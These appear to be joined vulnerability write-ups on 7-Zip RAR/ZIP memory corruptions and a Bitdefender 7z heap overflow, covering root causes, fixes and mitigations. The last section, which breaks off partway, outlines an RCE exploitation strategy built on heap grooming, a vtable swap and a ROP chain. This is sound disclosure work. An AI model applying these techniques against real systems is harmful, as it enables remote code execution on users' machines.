7-Zip: Multiple Memory Corruptions via RAR and ZIP


In the following, I will outline two bugs that affect 7-Zip before version 18.00 as well as p7zip. The first one (RAR PPMd) is the more critical and the more involved one. The second one (ZIP Shrink) seems to be less critical, but also much easier to understand.

Memory Corruptions via RAR PPMd (CVE-2018-5996)

7-Zip’s RAR code is mostly based on a recent UnRAR version. For version 3 of the RAR format, PPMd can be used, which is an implementation of the PPMII compression algorithm by Dmitry Shkarin. If you want to learn more about the details of PPMd and PPMII, I’d recommend Shkarin’s paper PPM: one step to practicality1.

Interestingly, the 7z archive format can be used with PPMd as well, and 7-Zip uses the same code that is used for RAR3. As a matter of fact, this is the very PPMd implementation that was used by Bitdefender in a way that caused a stack based buffer overflow.

In essence, this bug is due to improper exception handling in 7-Zip’s RAR3 handler. In particular, one might argue that it is not a bug in the PPMd code itself or in UnRAR’s extraction code.

The Bug

The RAR handler has a function NArchive::NRar::CHandler::Extract2 containing a loop that looks roughly as follows (heavily simplified!):

for (unsigned i = 0;; i++, /*OMITTED: unpack size updates*/) {
  //OMITTED: retrieve i-th item and setup input stream
  CMyComPtr<ICompressCoder> commonCoder;
  switch (item.Method) {
    case '0':
      commonCoder = copyCoder;
    case '1':
    case '2':
    case '3':
    case '4':
    case '5':
      unsigned m;
      for (m = 0; m < methodItems.Size(); m++)
        if (methodItems[m].RarUnPackVersion == item.UnPackVersion) { break; }
      if (m == methodItems.Size()) { m = methodItems.Add(CreateCoder(/*OMITTED*/)); }
      //OMITTED: solidness check
      commonCoder = methodItems[m].Coder;
  HRESULT result = commonCoder->Code(inStream, outStream, &packSize, &outSize, progress);
  //OMITTED: encryptedness, outsize and crc check

  if (result != S_OK) {
    if (result == S_FALSE) { opRes = NExtract::NOperationResult::kDataError; }
    else if (result == E_NOTIMPL) { opRes = NExtract::NOperationResult::kUnsupportedMethod; }
    else { return result; }

The important bit about this function is essentially that at most one coder is created for each RAR unpack version. If an archive contains multiple items that are compressed with the same RAR unpack version, those will be decoded with the same coder object.

Observe, moreover, that a call to the Code method can fail, returning the result S_FALSE, and the created coder will be reused for the next item anyway, given that the callback function does not catch this (it does not). So let us see where the error code S_FALSE may come from. The method NCompress::NRar3::CDecoder::Code3 looks as follows (again simplified):

STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream *outStream,
    const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) {
  try {
    if (!inSize) { return E_INVALIDARG; }
    //OMITTED: allocate and initialize VM, window and bitdecoder
    _outStream = outStream;
    _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1;
    return CodeReal(progress);
  catch(const CInBufferException &e)  { return e.ErrorCode; }
  catch(...) { return S_FALSE; }

The CInBufferException is interesting. As the name suggests, this exception may be thrown while reading from the input stream. It is not completely straightforward, but nevertheless easily possible to trigger the exception with a RAR3 archive item such that the error code is S_FALSE. I will leave it as an exercise for the interested reader to figure out the details of how this can be achieved.

Why is this interesting? Well, because in case RAR3 with PPMd is used this exception may be thrown in the middle of an update of the PPMd model, putting the soundness of the model state at risk. Recall that the same coder will be used for the next item even after a CInBufferException with error code S_FALSE has been thrown.

Note, moreover, that the RAR3 decoder holds the PPMd model state. A brief look at the method NCompress::NRar3::CDecoder::InitPPM3 reveals the fact that this model state is only reinitialized if an item explicitly requests it. This is a feature that allows to keep the same model with the collected probability heuristics between different items. But it also means that we can do the following:

  • Construct the first item of a RAR3 archive such that a CInBufferException with error code S_FALSEis thrown in the middle of a PPMd model update. Essentially, this means that we can let an arbitrary call to the Decode method of the range decoder used in Ppmd7_DecodeSymbol4 fail, jumping out of the PPMd code.
  • The subsequent item of the archive does not have the reset bit set that would cause the model to be reinitialized. Hence, the PPMd code will operate on a potentially broken model state.

So far this may not look too bad. In order to understand how this bug can be turned into attacker controlled memory corruptions, we need to understand a little bit more about the PPMd model state and how it is updated.

PPMd Preliminaries

The main idea of all PPM compression algorithms is to build a Markov model of some finite order D. In the PPMd implementation, the model state is essentially a 256-ary context tree of maximum depth D, in which the path from the root to the current context node is to be interpreted as a sequence of byte symbols. In particular, the parent relation is to be understood as a suffix relation. Additionally, every context node stores frequency statistics about possible successor symbols connected with a successor context node.

A context node is of type CPpmd7_Context, defined as follows:

typedef struct CPpmd7_Context_ {
  UInt16 NumStats;
  UInt16 SummFreq;
  CPpmd_State_Ref Stats;
  CPpmd7_Context_Ref Suffix;
} CPpmd7_Context;

The field NumStats holds the number of elements the Stats array contains5. The type CPpmd_State is defined as follows:

typedef struct {
  Byte Symbol;
  Byte Freq;
  UInt16 SuccessorLow;
  UInt16 SuccessorHigh;
} CPpmd_State;

So far, so good. Now what about the model update? I will spare you the details, describing only abstractly how a new symbol is decoded6:

  • When Ppmd7_DecodeSymbol is called, the current context is p->MinContext, which is equal to p->MaxContext, assuming a sound model state.
  • threshold value is read from the range decoder. This value is used to find a corresponding symbol in the Stats array of the current context p->MinContext.
  • If no corresponding symbol can be found, p->MinContext is moved upwards the tree (following the suffix links) until a context with (strictly) larger Stats array is found. Then, a new threshold is read and used to find a corresponding value in the current Stats array, ignoring the symbols of the contexts that have been previously visited. This process is repeated until a value is found.
  • Finally, the ranger decoder’s decode method is called, the found state is written to p->FoundState, and one of the Ppmd7_Update functions is called to update the model. As a part of this process, the UpdateModel function adds the found symbol to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

One of the key invariants the update mechanism tries to establish is that the Stats array of every context contains each of the 256 symbols at most once. However, this property only follows inductively, since there is no explicit duplicate check when a new symbol is inserted7. With the bug described above, it is easy to see how we can add duplicate symbols to Stats arrays:

  • The first RAR3 item is created such that a few context nodes are created, and the function Ppmd7_DecodeSymbol then moves p->MinContext upwards the tree at least once, until the corresponding symbol is found. Then, the subsequent call to the range decoders decode method fails with a CInBufferException.
  • The next RAR3 item does not have the reset bit set, so that we can continue with the previously created PPMd model.
  • The Ppmd7_DecodeSymbol function is entered with a fresh range decoder and p->MinContext != p->MaxContext. It finds the corresponding symbol immediately in p->MinContext. However, this symbol may now be one that already occurs in the contexts between p->MaxContext and p->MinContext. When the UpdateModel function is called, this symbol is added as a duplicate to the Stats array to each context between p->MaxContext and p->MinContext (exclusively).

Okay, so now we know how to add duplicate symbols into the Stats array. Let us see how we can make use of this to cause an actual memory corruption.

Triggering a Stack Buffer Overflow

The following code is run as a part of Ppmd7_DecodeSymbol to move the p->MinContext pointer upwards the context tree:

CPpmd_State *ps[256];
unsigned numMasked = p->MinContext->NumStats;
do {
  if (!p->MinContext->Suffix) { return -1; }
  p->MinContext = Ppmd7_GetContext(p, p->MinContext->Suffix);
} while (p->MinContext->NumStats == numMasked);
UInt32 hiCnt = 0;
CPpmd_State *s = Ppmd7_GetStats(p, p->MinContext);
unsigned i = 0;
unsigned num = p->MinContext->NumStats - numMasked;
do {
  int k = (int)(MASK(s->Symbol));
  hiCnt += (s->Freq & k);
  ps[i] = s++;
  i -= k;
} while (i != num);

MASK is a macro that accesses a byte array which holds the value 0x00 at the index of each masked symbol, and the value 0xFF otherwise. Clearly, the intention is to fill the stack buffer ps with pointers to all unmasked symbol states.

Observe that the stack buffer ps has a fixed size of 256 and there is no overflow check. This means that if the Stats array contains a masked symbol multiple times, we can access the array out of bound and overflow the ps buffer.

Usually, such out of bound buffer reads make exploitation very difficult, because one cannot easily control the memory that is read. However, this is no issue in the case of PPMd, because the implementation allocates only one large pool on the heap, and then makes use of its own memory allocator to allocate all context and state structs within this pool. This ensures very quick allocation and a low memory usage, but it also allows an attacker to control the out of bound read to structures within this pool very reliably and independently of the system’s heap implementation. For example, the first RAR3 item can be constructed such that the pool is filled with the desired data, avoiding uninitialized out of bound reads.

Finally, note that the attacker can overflow the stack buffer with pointers to data that is highly attacker controlled itself.

Triggering a Heap Buffer Overflow

Building on the previous section, we now want to corrupt the heap. Perhaps not surprisingly, it is also possible to read the Stats array out of bound without overflowing the stack buffer ps. This allows us to let s point to a CPpmd_State with attacker controlled data. Since p->FoundState may be one of the psstates and the model updating process assumes that the Stats array of p->MinContext as well as its suffix contexts contain the symbol p->FoundState->Symbol.

This code fragment is part of the function UpdateModel:

do { s++; } while (s->Symbol != p->FoundState->Symbol);
if (s[0].Freq >= s[-1].Freq) {
  SwapStates(&s[0], &s[-1]);

Again, there is no bound check on the Stats array, so the pointer s can be moved easily over the end of the allocated heap buffer. Optimally, we would construct our input such that s is out of bound and s-1within the allocated pool, allowing an attacker controlled heap corruption.

On Attacker Control, Exploitation and Mitigation

The 7-Zip binaries for Windows are shipped with neither the /NXCOMPAT nor the /DYNAMICBASE flags. This means effectively that 7-Zip runs without ASLR on all Windows systems, and DEP is only enabled on Windows x64 or on Windows 10 x86. For example, the following screenshot shows the most recent 7-Zip 18.00 running on a fully updated Windows 8.1 x86: 7-Zip 18.00 in Process Explorer on Windows 8.1 x86

Moreover, 7-Zip is compiled without /GS flag, so there are no stack canaries.

Since there are various ways to corrupt the stack and the heap in highly attacker controlled ways, exploitation for remote code execution is straightforward, especially if no DEP is used.

I have discussed this issue with Igor Pavlov and tried to convince him to enable all three flags. However, he refused to enable /DYNAMICBASE because he prefers to ship the binaries without relocation table to achieve a minimal binary size. Moreover, he doesn’t want to enable /GS, because it could affect the runtime as well as the binary size. At least he will try to enable /NXCOMPAT for the next release. Apparently, it is currently not enabled because 7-Zip is linked with an obsolete linker that doesn’t support the flag.


The outlined heap and stack memory corruptions are only scratching the surface of possible exploitation paths. Most likely there are many other and possibly even neater ways of causing memory corruptions in an attacker controlled fashion.

This bug demonstrates again how difficult it can be to integrate external code into an existing code base. In particular, handling exceptions correctly and understanding the control flow they induce can be challenging.

In the post about Bitdefender’s PPMd stack buffer overflow, I already made clear that the PPMd code is very fragile. A slight misuse of its API, or a tiny mistake while integrating it into another code base may lead to multiple dangerous memory corruptions.

If you use Shkarin’s PPMd implementation, I would strongly recommend you to harden it by adding out of bound checks wherever possible, and to make sure the basic model invariants always hold. Moreover, in case exceptions are used, one could add an additional error flag to the model that is set to true before updating the model, and only set to false after the update has been successfully completed. This should significantly mitigate the danger of corrupting the model state.

ZIP Shrink: Heap Buffer Overflow (CVE-2017-17969)

Let us proceed by discussing the other bug, which concerns ZIP Shrink. Shrink is an implementation of the Lempel-Ziv-Welch (LZW)8 compression algorithm. It has been used by PKWARE’s PKZIP before version 2.0, which was released in 1993 (sic!). In fact, shrink is so old and so rarely used, that already in 2005, when Igor Pavlov wrote 7-Zip’s shrink decoder, he had a hard time9 finding sample archives to test the code.

In essence, shrink is LZW with a dynamic code size between 9 and 13 bits, and a special feature that allows to partially clear the dictionary.

7-Zip’s shrink decoder is quite straightforward and easy to understand. In fact, it consists of only 200 lines of code. Nevertheless, it contains a buffer overflow bug.

The Bug

The shrink model’s state essentially only consists of the two arrays _parents and _suffixes, which store the LZW dictionary in a space efficient way. Moreover, there is a buffer _stack to which the current sequence is written:

  UInt16 _parents[kNumItems];
  Byte _suffixes[kNumItems];
  Byte _stack[kNumItems];

The following code fragment is part of the method NCompress::NShrink::CDecoder::CodeReal10:

unsigned cur = sym;
unsigned i = 0;
while (cur >= 256) {
  _stack[i++] = _suffixes[cur];
  cur = _parents[cur];

Observe that there is no bound check on the value of i.

One way this can be exploited to overflow the heap buffer _stack is by constructing a symbol of sequence such that the _parents array forms a cycle. This is possible, because the decoder only ensures that a parent node does not link to itself (cycle of length one). Interestingly, the old versions of PKZIP create shrink archives that may contain such self-linked parents, so a compatible implementation should actually accept this (7-Zip 18.00 fixes this).

Moreover, using the special symbol sequence 256,2 one can clear parent nodes in an attacker controlled fashion. A cleared parent node will be set to kNumItems. Since there is no check whether a parent has been cleared or not, the parents array can be accessed out of bound.

This sounds promising, and it is actually possible to construct archives that make the decoder write attacker controlled data out of bound. However, I didn’t find an easy way to do so without ending up in an infinite loop. This matters, because the index i is increased in every iteration of the loop. Hence, an infinite loop will quickly lead to a segmentation fault, making exploitation for code execution very difficult (if not impossible). However, I didn’t spend too much time on this, so maybe it is possible to corrupt the heap without entering an infinite loop after all.

Bitdefender: Heap Buffer Overflow via 7z LZMA


For the write-up on the 7z PPMD bug, I read a lot of the original 7-Zip source code and discovered a few new things that looked promising to investigate in anti-virus products. Therefore, I took another stab at analyzing Bitdefender’s 7z module.

I previously wrote about relaxed file processing. The Bitdefender 7z PPMD stack buffer overflow1 was a good example of relaxed file processing by removing a check (that is, removing code).

This bug demonstrates another fundamental difficulty that arises when incorporating new code into an existing code base. In particular, a minimal set of changes to the new code is often inevitable. Mostly, this affects memory allocation and code that is concerned with file access, especially if a totally different file abstraction is used. The presented bug is an example of the former type of difficulty. More specifically, an incorrect use of a memory allocation function that extends the 7-Zip source code in Bitdefender’s 7z module causes a heap buffer overflow.

Getting Into the Details

When Bitdefender’s 7z module discovers an EncodedHeader3 in a 7z archive, it tries to decompress it with the LZMA decoder. Their code seems to be based on 7-Zip, but they made a few changes. Loosely speaking, the extraction of a 7z EncodedHeader is implemented as follows:

  1. Read the unpackSize from the 7z EncodedHeader.
  2. Allocate unpackSize bytes.
  3. Use the C API of the LZMA decoder that comes with 7-Zip and let it decompress the stream.

The following snippet shows how the allocation function is called:

1DD02A845FA lea     rcx, [rdi+128h] //<-------- result
1DD02A84601 mov     rbx, [rdi+168h]
1DD02A84608 mov     [rsp+128h], rsi
1DD02A84610 mov     rsi, [rax+10h]
1DD02A84614 mov     [rsp+0E0h], r15
1DD02A8461C mov     edx, [rsi]      //<-------- size
1DD02A8461E call    SZ_AllocBuffer

Recall the x64 calling convention. In particular, the first two integer arguments (from left to right) are passed via rcx and rdx.

SZ_AllocBuffer is a function within the Bitdefender 7z module. It has two arguments:

  • The first argument result is a pointer to which the result (a pointer to the allocated buffer in case of success or NULL in case of a failure) is written.
  • The second argument size is the allocation size.

Let us look at the functions’s implementation.

260ED3025D0 SZ_AllocBuffer proc near
260ED3025D0 mov     [rsp+8], rbx
260ED3025D5 push    rdi
260ED3025D6 sub     rsp, 20h
260ED3025DA mov     rbx, rcx
260ED3025DD mov     edi, edx //<-------- edi holds size
260ED3025DF mov     rcx, [rcx]
260ED3025E2 test    rcx, rcx
260ED3025E5 jz      short loc_260ED3025EC
260ED3025E7 call    near ptr irrelevant_function
260ED3025EC loc_260ED3025EC:
260ED3025EC cmp     edi, 0FFFFFFFFh  //<------- {*}
260ED3025EF jbe     short loc_260ED302606
260ED3025F1 xor     ecx, ecx
260ED3025F3 mov     [rbx], rcx
260ED3025F6 mov     eax, ecx
260ED3025F8 mov     [rbx+8], ecx
260ED3025FB mov     rbx, [rsp+30h]
260ED302600 add     rsp, 20h
260ED302604 pop     rdi
260ED302605 retn
260ED302606 ; ------------------------------------
260ED302606 loc_260ED302606:                        
260ED302606 mov     rcx, rdi  //<------ set size argument for mymalloc
260ED302609 call    mymalloc
//[rest of the function omitted]

Note that mymalloc is just a wrapper function that eventually calls malloc and returns the result.

Apparently, the programmer expected the size argument of SZ_AllocBuffer to be of a type with size greater than 32 bits. Obviously, it is only a 32-bit value.

It is funny to see that the compiler failed to optimize away the comparison at {*}, given that its result is only used for an unsigned comparison jbe. If you have any hints on why this might happen, I’d be very interested to hear them.

After SZ_AllocBuffer returns, the function LzmaDecode is called:

LzmaDecode(Byte *dest, SizeT *destLen, const Byte *src, SizeT *srcLen, /* further arguments omitted */)

Note that dest is the buffer allocated with SZ_AllocBuffer and destLen is supposed to be a pointer to the buffer’s size.

In the reference implementation, SizeT is defined as size_t. Interestingly, Bitdefender’s 7z module uses a 64-bit type for SizeT in both the 32-bit and the 64-bit version, making both versions vulnerable to this bug. I suspect that this is the result of an effort to create identical behavior for the 32-bit and 64-bit versions of the engine.

The LZMA decoder extracts the given src stream and writes (up to) *destLen bytes to the dest buffer, where *destLen is the 64-bit unpackSize from the 7z EncodedHeader. This results in a neat heap buffer overflow.

Triggering the Bug

To trigger the bug, we create a 7z LZMA stream containing the data we want to write on the heap. Then, we construct a 7z EncodedHeader with a Folder that has an unpackSize of (1<<32) + 1. This should make the function SZ_AllocBuffer allocate a buffer of 1 byte.

That sounds nice, but does this actually work?

0:000> g
!Heap block at 1F091472D40 modified at 1F091472D51 past requested size of 1
(2f8.14ec): Break instruction exception - code 80000003 (first chance)
00007ff9`d849c4ce cc              int     3

0:000> db 1F091472D51
000001f0`91472d51  59 45 53 2c 20 54 48 49-53 20 57 4f 52 4b 53 ab  YES, THIS WORKS.

Attacker Control and Exploitation

The attacker can write completely arbitrary data to the heap without any restriction. A file system minifilter is used to scan all files that touch the disk, making this vulnerability easily exploitable remotely, for example by sending an e-mail with a crafted file as attachment to the victim.

Moreover, the engine runs unsandboxed and as NT Authority\SYSTEM. Hence, this bug is highly critical. However, since ASLR and DEP are in place, successful exploitation for remote code execution might require another bug (e.g. an information leak) to bypass ASLR.

Note also that Bitdefender’s engine is licensed to many different anti-virus vendors, all of which could be affected by this bug.

The Fix

The patched version of the function SZ_AllocBuffer looks as follows:

1E0CEA52AE0 SZ_AllocBuffer proc near
1E0CEA52AE0 mov     [rsp+8], rbx
1E0CEA52AE5 mov     [rsp+10h], rsi
1E0CEA52AEA push    rdi
1E0CEA52AEB sub     rsp, 20h
1E0CEA52AEF mov     esi, 0FFFFFFFFh
1E0CEA52AF4 mov     rdi, rdx  //<-----rdi holds the size
1E0CEA52AF7 mov     rbx, rcx
1E0CEA52AFA cmp     rdx, rsi  //<------------{1}
1E0CEA52AFD jbe     short loc_1E0CEA52B11
1E0CEA52AFF xor     eax, eax
1E0CEA52B01 mov     rbx, [rsp+30h]
1E0CEA52B06 mov     rsi, [rsp+38h]
1E0CEA52B0B add     rsp, 20h
1E0CEA52B0F pop     rdi
1E0CEA52B10 retn
1E0CEA52B11 ; -----------------------------------
1E0CEA52B11 loc_1E0CEA52B11: 
1E0CEA52B11 mov     rcx, [rcx]
1E0CEA52B14 test    rcx, rcx
1E0CEA52B17 jz      short loc_1E0CEA52B1E
1E0CEA52B19 call    near ptr irrelevant_function
1E0CEA52B1E loc_1E0CEA52B1E: 
1E0CEA52B1E cmp     edi, esi  //<------------{2}
1E0CEA52B20 jbe     short loc_1E0CEA52B29
1E0CEA52B22 xor     ecx, ecx
1E0CEA52B24 mov     [rbx], rcx
1E0CEA52B27 jmp     short loc_1E0CEA52B3B
1E0CEA52B29 ; -----------------------------------
1E0CEA52B29 loc_1E0CEA52B29:
1E0CEA52B29 mov     ecx, edi
1E0CEA52B2B call    near ptr mymalloc
//[rest of the function omitted]

Most importantly, we see that the function’s second argument size has been changed to a 64-bit type.

Note that at {1}, a check ensures that the passed size is not greater than 0xFFFFFFFF.

At {2}, the value of rdi is guaranteed to be at most 0xFFFFFFFF, hence it suffices to use the 32-bit register edi. However, just as in the original version (see above), it is useless to compare this 32-bit value once more to 0xFFFFFFFF and it is a mystery to me why the compiler does not optimize this away.

Using a full 64-bit type for the second argument size resolves the described bug.


In a nutshell, the discovered bug is a 64-bit value size being passed to the allocation function SZ_AllocBuffer which looks roughly like this4:

void* SZ_AllocBuffer(void *resultptr, uint32_t size);

Assuming that the size is not explicitly casted, the compiler should throw a warning of the following kind:

warning C4244: 'argument': conversion from 'uint64_t' to 'uint32_t', possible loss of data

Note that in Microsoft’s MSVC compiler, this is a Level2 warning (Level1 being the lowest and Level4 being the highest level). Hence, this bug most likely could have been avoided simply by taking compiler warnings seriously.

For a critical codebase such as the engine of an anti-virus product, it would be adequate to treat warnings as errors, at least up to a warning level of 2 or 3.

Nevertheless, the general type of bug shows that even if only few lines of additional code are necessary to incorporate external code (such as the 7-Zip code) into a code base, those very lines can be particularly prone to error.


7-Zip From Uninitialized Memory to Remote Code Execution


7-Zip’s RAR code is mostly based on a recent UnRAR version, but especially the higher-level parts of the code have been heavily modified. As we have seen in some of my earlier blog posts, the UnRAR code is very fragile. Therefore, it is hardly surprising that any changes to this code are likely to introduce new bugs.

Very abstractly, the bug can be described as follows: The initialization of some member data structures of the RAR decoder classes relies on the RAR handler to configure the decoder correctly before decoding something. Unfortunately, the RAR handler fails to sanitize its input data and passes the incorrect configuration into the decoder, causing usage of uninitialized memory.

Now you may think that this sounds harmless and boring. Admittedly, this is what I thought when I first discovered the bug. Surprisingly, it is anything but harmless.

In the following, I will outline the bug in more detail. Then, we will take a brief look at 7-Zip’s patch. Finally, we will see how the bug can be exploited for remote code execution.

The Bug (CVE-2018-10115)

This new bug arises in the context of handling solid compression. The idea of solid compression is simple: Given a set of files (e.g., from a folder), we can interpret them as the concatenation to one single data block, and then compress this whole block (as opposed to compressing every file for itself). This can yield a higher compression rate, in particular if there are many files that are somewhat similar.

In the RAR format (before version 5), solid compression can be used in a very flexible way: Each item (representing a file) of the archive can be marked as solid, independently from all other items. The idea is that if an item is decoded that has this solid bit set, the decoder would not reinitialize its state, essentially continuing from the state of the previous item.

Obviously, one needs to make sure that the decoder object initializes its state at the beginning (for the first item it is decoding). Let us have a look at how this is implemented in 7-Zip. The RAR handler has a method NArchive::NRar::CHandler::Extract1 that contains a loop which iterates with a variable index over all items. In this loop, we can find the following code:

Byte isSolid = (Byte)((IsSolid(index) || item.IsSplitBefore()) ? 1: 0);
if (solidStart) {
  isSolid = 0;
  solidStart = false;

RINOK(compressSetDecoderProperties->SetDecoderProperties2(&isSolid, 1));

The basic idea is to have a boolean flag solidStart, which is initialized to true (before the loop), making sure that the decoder is configured with isSolid==false for the first item that is decoded. Furthermore, the decoder will (re)initialize its state (before starting to decode) whenever it is called with isSolid==false.

That seems to be correct, right? Well, the problem is that RAR supports three different encoding methods (excluding version 5), and each item can be encoded with a different method. In particular, for each of these three encoding methods there is a different decoder object. Interestingly, the constructors of these decoder objects leave a large part of their state uninitialized. This is because the state needs to be reinitialized for non-solid items anyway and the implicit assumption is that the caller of the decoder would make sure that the first call on the decoder is with isSolid==false. We can easily violate this assumption with a RAR archive that is constructed as follows2:

  • The first item uses encoding method v1.
  • The second item uses encoding method v2 (or v3), and has the solid bit set.

The first item will cause the solidStart flag to be set to false. Then, for the second item, a new Rar2 decoder object is created and (since the solid flag is set) the decoding is run with a large part of the decoder’s state being uninitialized.

At first sight, this may not look too bad. However, various parts of the uninitialized state can be used to cause memory corruptions:

  1. Member variables holding the size of heap-based buffers. These variables may now hold a size that is larger than the actual buffer, allowing a heap-based buffer overflow.
  2. Arrays with indices that are used to index into other arrays, for both reading and writing values.
  3. The PPMd state discussed in my previous post. Recall that the code relies heavily on the soundness of the model’s state, which can now be violated easily.

Obviously, the list is not complete.

The Fix

In essence, the bug is that the decoder classes do not guarantee that their state is correctly initialized before they are used for the first time. Instead, they rely on the caller to configure the decoder with isSolid==false before the first item is decoded. As we have seen, this does not turn out very well.

There are two different approaches to resolve this bug:

  1. Make the constructor of the decoder classes initialize the full state.
  2. Add an additional boolean member solidAllowed (which is initialized to false) to each decoder class. If isSolid==true even though solidAllowed==false, the decoder can abort with a failure (or set isSolid=false).

UnRAR seems to implement the first option. Igor Pavlov, however, chose to go with a variant of the second option for 7-Zip.

In case you want to patch a fork of 7-Zip or you are just interested in the details of the fix, you might want to have a look at this file, which summarizes the changes.

On Exploitation Mitigation

In the previous post on the 7-Zip bugs CVE-2017-17969 and CVE-2018-5996, I mentioned the lack of DEP and ASLR in 7-Zip before version 18.00 (beta). Shortly after the release of that blog post, Igor Pavlov released 7-Zip 18.01 with the /NXCOMPAT flag, delivering on his promise to enable DEP on all platforms. Moreover, all dynamic libraries (7z.dll7-zip.dll7-zip32.dll) have the /DYNAMICBASE flag and a relocation table. Hence, most of the running code is subject to ASLR.

However, all main executables (7zFM.exe7zG.exe7z.exe) come without /DYNAMICBASE and have a stripped relocation table. This means that not only are they not subject to ASLR, but you cannot even enforce ASLR with a tool like EMET or its successor, the Windows Defender Exploit Guard.

Obviously, ASLR can only be effective if all modules are properly randomized. I discussed this with Igor and convinced him to ship the main executables of the new 7-Zip 18.05 with /DYNAMICBASE and relocation table. The 64-bit version still runs with the standard non-high entropy ASLR (presumably because the image base is smaller than 4GB), but this is a minor issue that can be addressed in a future release.

On an additional note, I would like to point out that 7-Zip never allocates or maps additional executable memory, making it a great candidate for Arbitrary Code Guard (ACG). In case you are using Windows 10, you can enable it for 7-Zip by adding the main executables 7z.exe7zFM.exe, and 7zG.exe in the Windows Defender Security Center (App & browser control -> Exploit Protection -> Program settings). This will essentially enforce a W^X policy and therefore make exploitation for code execution substantially more difficult.

Writing a Code Execution Exploit

Normally, I would not spend much time thinking about actual weaponized exploits. However, it can sometimes be instructive to write an exploit, if only to learn how much it actually takes to succeed in the given case.

The platform we target is a fully updated Windows 10 Redstone 4 (RS4, Build 17134.1) 64-bit, running 7-Zip 18.01 x64.

Picking an Adequate Exploitation Scenario

There are three basic ways to extract an archive using 7-Zip:

  1. Open the archive with the GUI and either extract files separately (using drag and drop), or extract the whole archive using the Extract button.
  2. Right-click the archive and select "7-Zip->Extract Here" or "7-Zip->Extract to subfolder" from the context menu.
  3. Using the command-line version of 7-Zip.

Each of these three methods will invoke a different executable (7zFM.exe7zG.exe7z.exe). Since we want to exploit the lack of ASLR in these modules, we need to fix the extraction method.

The second method (extraction via context menu) seems to be the most attractive one, since it is a method that is probably used very often, and at the same time it should give us a quite predictable behavior (unlike the first method, where a user might decide to open the archive but then extract the “wrong” file). Hence, we go with the second method.

Exploitation Strategy

Using the bug from above, we can create a Rar decoder that operates on (mostly) uninitialized state. So let us see for which Rar decoder this may allow us to corrupt the heap in an attacker-controlled manner.

One possibility is to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::HuffDecode3contains the following code:

int bytePlace = DecodeNum(...);
// some code omitted
bytePlace &= 0xff;
// more code omitted
for (;;)
  curByte = ChSet[bytePlace];
  newBytePlace = NToPl[curByte++ & 0xff]++;
  if ((curByte & 0xff) > 0xa1)
    CorrHuff(ChSet, NToPl);

ChSet[bytePlace] = ChSet[newBytePlace];
ChSet[newBytePlace] = curByte;
return S_OK;

This is very useful, because the uninitialized state of the Rar1 decoder includes the uint32_t arrays ChSet and NtoPl. Hence, newBytePlace is an attacker-controlled uint32_t, and so is curByte (with the restriction that the least significant byte cannot be larger than 0xa1). Moreover, bytePlace is determined by the input stream, so it is attacker-controlled as well (but cannot be larger than 0xff).

So this would give us a pretty good (though not perfect) read-write primitive. Note, however, that we are in a 64-bit address space, so we will not be able to reach the vtable pointer of the Rar1 decoder object with a 32-bit offset (even if multiplied by sizeof(uint32_t)) from ChSet. Therefore, we will target the vtable pointer of an object that is placed after the Rar1 decoder on the heap.

The idea is to use a Rar3 decoder object for this purpose, which we will use at the same time to hold our payload. In particular, we use the RW-primitive from above to swap the pointer _windows, which is a member variable of the Rar3 decoder, with the vtable pointer of the very same Rar3 decoder object._window points to a 4MB-sized buffer which holds data that has been extracted with the decoder (i.e., it is fully attacker-controlled).

Naturally, we will fill the _window buffer with the address of a stack pivot (xchg rax, rsp), followed by a ROP chain to obtain executable memory and execute the shellcode (which we also put into the _windowbuffer).

Putting a Replacement Object on the Heap

In order to succeed with the outlined strategy, we need to have full control of the decoder’s uninitialized memory. Roughly speaking, we will do this by making an allocation of the size of the Rar1 decoder object, writing the desired data to it, and then freeing it at some point before the actual Rar1 decoder is allocated.

Obviously, we will need to make sure that the Rar1 decoder’s allocation actually reuses the same chunk of memory that we freed before. A straightforward way to achieve this is to activate Low Fragmentation Heap (LFH) on the corresponding allocation size, then spray the LFH with multiple of those replacement objects. This actually works, but because allocations on the LFH are randomized since Windows 8, this method will never be able to place the Rar1 decoder object in constant distance to any other object. Therefore, we try to avoid the LFH and place our object on the regular heap. Very roughly, the allocation strategy is as follows:

  1. Create around 18 pending allocations of all (relevant) sizes smaller than the Rar1 decoder object. This will activate LFH for these allocation sizes and prevent such small allocations from destroying our clean heap structure.
  2. Allocate the replacement object and free it, making sure it is surrounded by busy allocations (and hence not merged with other free chunks).
  3. Rar3 decoder is allocated (the replacement object is not reused, because the Rar3 decoder is larger than the Rar1 decoder).
  4. Rar1 decoder is allocated (reusing the replacement object).

Note that it is unavoidable to allocate some decoder before allocating that Rar1 decoder, because only this way the solidStart flag will be set to false and the next decoder will not be initialized correctly (see above).

If everything works as planned, the Rar1 decoder reuses our replacement object, and the Rar3 decoder object is placed with some constant offset after the Rar1 decoder object.

Allocating and Freeing on the Heap

Obviously, the above allocation strategy requires us to be able to make heap allocations in a reasonably controlled manner. Going through the whole code of the RAR handler, I could not find many good ways to make dynamic allocations on the default process heap that have attacker-controlled size and store attacker-controlled content. In fact, it seems that the only way to do such dynamic allocations is via the names of the archive’s items. Let us see how this works.

When an archive is opened, the method NArchive::NRar::CHandler::Open21 reads all items of the archive with the following code (simplified):

CItem item;

for (;;)
  // some code omitted
  bool filled;
  archive.GetNextItem(item, getTextPassword, filled, error);
  // some more code omitted
  if (!filled) {
    // some more code omitted
  if (item.IgnoreItem()) { continue; }
  bool needAdd = true;
  // some more code omitted

The class CItem has a member variable Name of type AString, which stores the (ASCII) name of the corresponding item in a heap-allocated buffer.

Unfortunately, the name of an item is set as follows in NArchive::NRar::CInArchive::ReadName1:

for (i = 0; i < nameSize && p[i] != 0; i++) {}
item.Name.SetFrom((const char *)p, i);

I say unfortunately, because this means that we cannot write completely arbitrary bytes to the buffer. In particular, it seems that we cannot write null bytes. This is bad, because the replacement object we want to put on the heap requires a few zero bytes. So what can we do? Well, let us look at AString::SetFrom4:

void AString::SetFrom(const char *s, unsigned len)
  if (len > _limit)
    char *newBuf = new char[len + 1];
    delete []_chars;
    _chars = newBuf;
    _limit = len;
  if (len != 0)
    memcpy(_chars, s, len);
  _chars[len] = 0;
  _len = len;

